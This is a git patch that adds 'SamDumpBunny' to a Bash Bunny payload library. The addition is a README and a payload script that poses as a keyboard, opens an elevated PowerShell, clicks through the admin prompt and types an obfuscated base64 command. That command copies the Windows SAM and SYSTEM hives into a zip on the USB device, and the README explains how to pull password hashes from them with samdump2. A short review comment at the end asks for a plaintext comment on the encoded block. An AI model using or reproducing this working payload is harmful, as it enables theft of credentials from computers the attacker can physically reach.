From 614d313690580aba87bb1facb4fbc29e4e2e1a40 Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Wed, 8 Jun 2022 11:13:14 +0200
Subject: [PATCH] Uploaded SamDumpBunny
Dumps the users' SAM and SYSTEM hives, which can later be used to extract the users' hashes
---
.../credentials/SamDumpBunny/README.md | 21 ++++++++
.../credentials/SamDumpBunny/payload.txt | 53 +++++++++++++++++++
2 files changed, 74 insertions(+)
create mode 100644 payloads/library/credentials/SamDumpBunny/README.md
create mode 100644 payloads/library/credentials/SamDumpBunny/payload.txt
diff --git a/payloads/library/credentials/SamDumpBunny/README.md b/payloads/library/credentials/SamDumpBunny/README.md
new file mode 100644
index 00000000..7d023d7e
--- /dev/null
+++ b/payloads/library/credentials/SamDumpBunny/README.md
@@ -0,0 +1,21 @@
+**Title: SamDumpBunny**
+
+
Author: 0iphor13
+OS: Windows
+Version: 1.0
+
+**What is SamDumpBunny?**
+#
+
SamDumpBunny dumps the users sam and system hive and compresses them into a zip file.
+Afterwards you can use a tool like samdump2 to extract the users hashes.
+
+
+**Instruction:**
+1. Plug in your Bashbunny and wait a few seconds
+
+2. Unzip the exfiltrated zip file onto your machine.
+
+3. Use a tool like samdump2 on your machine to extract the users hashes.
+ > `samdump2 BunnySys BunnySam`
+
+
\ No newline at end of file
diff --git a/payloads/library/credentials/SamDumpBunny/payload.txt b/payloads/library/credentials/SamDumpBunny/payload.txt
new file mode 100644
index 00000000..cc3120e3
--- /dev/null
+++ b/payloads/library/credentials/SamDumpBunny/payload.txt
@@ -0,0 +1,53 @@
+#!/bin/bash
+#
+# Title: SamDumpBunny
+# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
+# Author: 0iphor13
+# Version: 1.0
+# Category: Credentials
+# Attackmodes: HID, Storage
+
+LED SETUP
+
+Q DELAY 500
+
+GET SWITCH_POSITION
+DUCKY_LANG de
+
+Q DELAY 500
+
+ATTACKMODE HID STORAGE
+
+#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+
+LED STAGE1
+
+Q DELAY 1000
+RUN WIN "powershell Start-Process powershell -Verb runAs"
+Q ENTER
+Q DELAY 1000
+
+#Shortcut for pressing yes - Needs to be adapted for your language (ger=ALT j;engl=ALT y; etc...)
+Q ALT j
+Q DELAY 250
+
+Q DELAY 250
+Q STRING "powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAQgB1AG4AbgB5AFMAYQBtADsAcgBlAGcAIABzAGEAdgBlAC"
+Q DELAY 250
+Q STRING "AAaABrAGwAbQBcAHMAeQBzAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgA"
+Q DELAY 250
+Q STRING "CIAJABQAFcARABcAEIAdQBuAG4AeQBTAHkAcwAiACwAIAAiACQAUABXAEQAXABCAHUAbgBuAHkAUwBhAG0AIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBu"
+Q DELAY 250
+Q STRING "AFAAYQB0AGgAIABTAGEAbQBEAHUAbQBwAEIAdQBuAG4AeQAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAcgBl"
+Q DELAY 250
+Q STRING "AG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAYQBtADsAZQB4AGkAdAA="
+Q DELAY 250
+Q STRING ";mv SamDumpBunny.zip ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
+Q DELAY 250
+Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';Start-Sleep 3;(New-Object -comObject Shel"
+Q DELAY 250
+Q STRING "l.Application).Namespace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
+Q DELAY 300
+Q ENTER
+
+LED FINISH
\ No newline at end of file
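Review bot: The command typed at lines 82-90 is one base64/UTF-16 `-enc` blob with no plaintext equivalent anywhere in the file, so a library reviewer cannot confirm what the elevated PowerShell session actually runs without decoding it by hand. Add a comment above line 82 that states the decoded command in prose, e.g. `# Decoded -enc block: save the SAM and SYSTEM hives, zip them as SamDumpBunny.zip, delete the hive copies, exit`, and keep it in sync whenever the encoded string is regenerated. Separately, `GET SWITCH_POSITION` on line 61 populates `$SWITCH_POSITION` but nothing in the file reads it, so the line should be dropped or the intended per-switch behaviour documented.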